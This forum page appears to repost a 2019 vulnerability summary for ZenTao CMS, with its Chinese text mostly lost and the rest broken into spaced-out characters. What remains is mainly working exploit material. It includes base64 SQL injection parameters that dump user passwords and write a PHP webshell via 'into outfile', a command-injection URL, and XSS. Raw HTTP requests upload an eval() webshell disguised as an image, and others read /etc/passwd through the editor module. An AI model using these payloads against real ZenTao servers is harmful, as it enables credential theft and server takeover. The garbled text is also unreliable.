搜索

[18795] 2019-07-22_禅道cms漏洞总结

文档创建者:s7ckTeam
浏览次数:13
最后更新:2025-01-18
2019-07-22_禅道cms漏洞总结 c m s c r h u a   h u a s e c   2 0 1 9 - 0 7 - 2 2 0 1 0 2 便 0 3 u r l 访 P A T H _ I N F O h t m l G E T c m s g e t 0 4 a d m i n 1 2 3 4 5 6 0 5 / i n d e x . p h p ? m o d e = g e t c o n f i g u s e r - l o g i n - L 3 p l b n R h b 3 B t c z E w L j M u M S 9 3 d 3 c v . h t m l i n d e x . p h p ? m = b l o c k & f = m a i n & m o d e = g e t b l o c k d a t a
8 . 2   -   9 . 2 . 1 r e f e r e r p a r a m b a s e 6 4 p a r a m   b a s e 6 4 s h e l l r e q u e s t T y p e P A T H _ I N F O r e q u e s t T y p e G E T p a r a m j s o n b a s e 6 4 0 6 1 0 . 3 . 1   x x x - x x x - x x x . h t m l   p a y l o a d 3 u r l   p a y l o a d / i n d e x . p h p ? m = b l o c k & f = m a i n & m o d e = g e t b l o c k d a t a & b l o c k i d = c a s e & p a r a m = e y J v c m R l c k J 5 I j o i b 3 J k Z X I g b G l t a X Q g M S w x J y I s I m 5 1 b S I 6 I j E s M S I s I n R 5 c G U i O i J v c G V u Z W R i e W 1 l I n 0 = { " o r d e r B y " : " o r d e r   l i m i t   1 , 1 ' " , " n u m " : " 1 , 1 " , " t y p e " : " o p e n e d b y m e " } / i n d e x . p h p ? m = b l o c k & f = m a i n & m o d e = g e t b l o c k d a t a & b l o c k i d = c a s e & p a r a m = e y J v c m R l c k J 5 I j o i b 3 J k Z X I g b G l t a X Q g M S w x I F B S T 0 N F R F V S R S B B T k F M W V N F K H B v b H l n b 2 4 o a W Q p L D E p I y I s I m 5 1 b S I 6 I j E s M S I s I n R 5 c G U i O i J v c G V u Z W R i e W 1 l I n 0 { " o r d e r B y " : " o r d e r   l i m i t   1 , 1   P R O C E D U R E   A N A L Y S E ( p o l y g o n ( i d ) , 1 ) # " , " n u m " : " 1 , 1 " , " t y p e " : " o p e n e d b y m e " } h t t p : / / t e s t . c o m / b l o c k - m a i n . h t m l ? m o d e = g e t b l o c k d a t a & b l o c k i d = t a s k & p a r a m = e y J h Y 2 N v d W 5 0 I j o i Y W R t a W 4 W Q 9 L T E g V U 5 J T 0 4 g U 0 V M R U N U I D E s M i w z L D Q s N S w 2 L G F j Y 2 9 1 b n Q s O C w 5 L H B h c 3 N 3 b 3 J k L D E s M i w z L D Q s N S w 2 L D c s O C w 5 L D A s M S w y L D M s N C w 1 L D Y s N y w 4 L D k s M C w x L D I s M y w 0 L D U s N i w 3 L D g g R l J P T S B 6 d F 9 1 c 2 V y I y J i n d e x . p h p ? m = b l o c k & f = m a i n & m o d e = g e t b l o c k d a t a & b l o c k i d = c a s e & p a r a m = e y J v c m R l c k J 5 I j o i b 3 J k Z X I g b G l t a X Q g M S w x O 3 N l b G V j d C A n P D 9 w a H A g c G h w a W 5 m b y c g a W 5 0 b y B v d X R m a W x l I C d k O i 9 l L n B o c C c j I i w i b n V t I j o i M S w x I i w i d H l w Z S I 6 I m 9 w Z W 5 l Z G J 5 b W U i f Q = = { " o r d e r B y " : " o r d e r   l i m i t   1 , 1 ; s e l e c t   ' < ? p h p   p h p i n f o '   i n t o   o u t f i l e   ' / o p t / z b o x / a p p / z e n t a o / s h e l l . p h p ' # " , " n u m " : " 1 , 1 " , " t y p e " : " o p e n e d b y m e " } a p i - g e t M o d e l - s v n - g e t R e p o L o g s - r e p o = t e s t , f r o m R e v i s i o n = % 2 5 2 5 2 6 i p c o n f i g % 2 5 2 5 2 6 . h t m l
0 7 X S S < 1 0 . 3 . 1 p a y l o a d : 0 8   7 . 3 , 4 . 7 . 1   p a y l o a d : s h e l l 0 9 5 . 2   5 . 3   6 . 2   - >     - >   & A P I   - >       - >   a p i - g e t M o d e l - s v n - g e t R e p o L o g s - r e p o = t e s t , f r o m R e v i s i o n = % 2 5 2 5 2 6 e c h o % 2 5 2 5 2 0 t e s t % 2 5 2 5 3 e t 1 . p h p % 2 5 2 5 2 6 . h t m l m i s c - c h e c k U p d a t e . h t m l ? n o t e = P G 9 i a m V j d C B k Y X R h P S J k Y X R h O n R l e H Q v a H R t b D t i Y X N l N j Q s U E h O a m N t b H d k R D V o Y k d W e W R D Z 3 h L V H d 2 Y z J O e W F Y Q j B Q Z z 0 9 I j 4 = & b r < i m g   s r c = " d a t a : i m a g e / p h p ; b a s e 6 4 , P D 9 w a H A g Z X Z h b C g k X 1 B P U 1 R b d G 1 k X S k / P g = = "         / > P O S T   / o f f i c i a l / Z e n T a o P M S . P r o 4 . 7 . 1 / z e n t a o p m s / w w w / f i l e - a j a x P a s t e I m a g e . h t m l   H T T P / 1 . 1 H o s t :   1 2 7 . 0 . 0 . 1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 3 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 4 5 . 0 . 2 4 5 4 . 8 5   S a f a r i / 5 3 7 . 3 6 e d i t o r = < i m g   s r c = " d a t a : i m a g e / p h p ; b a s e 6 4 , P D 9 w a H A g Z X Z h b C g k X 1 B P U 1 R b d G 1 k X S k / P g = = "             / / i n d e x . p h p ? m = e d i t o r & f = i n d e x & t y p e = e d i t o r
访 使 f i l e P a t h b a s e 6 4 P O S T   / z d / w w w / i n d e x . p h p ? m = e d i t o r & f = s a v e & f i l e P a t h = L 3 Z h c i 9 3 d 3 c v e m Q v d 3 d 3 L 2 R h d G E v d X B s b 2 F k L z E u c G h w & a c t i o n = n e w P a g e   H T T P / 1 . 1 H o s t :   1 7 2 . 1 6 . 0 . 1 2 8 : 8 1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 9 ;   r v : 3 2 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 3 2 . 0 f i l e C o n t e n t = < ? p h p @ e v a l ( $ _ P O S T [ ' t e s t ' ] ) ; ? > G E T   / z d / w w w / i n d e x . p h p ? m = e d i t o r & f = e d i t & f i l e P a t h = L 2 V 0 Y y 9 w Y X N z d 2 Q = & a c t i o n = o v e r r i d e & i s E x t e n d s =   H T T P / 1 . 1 H o s t :   1 7 2 . 1 6 . 0 . 1 2 8 : 8 1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 . 9 ;   r v : 3 2 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 3 2 . 0
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理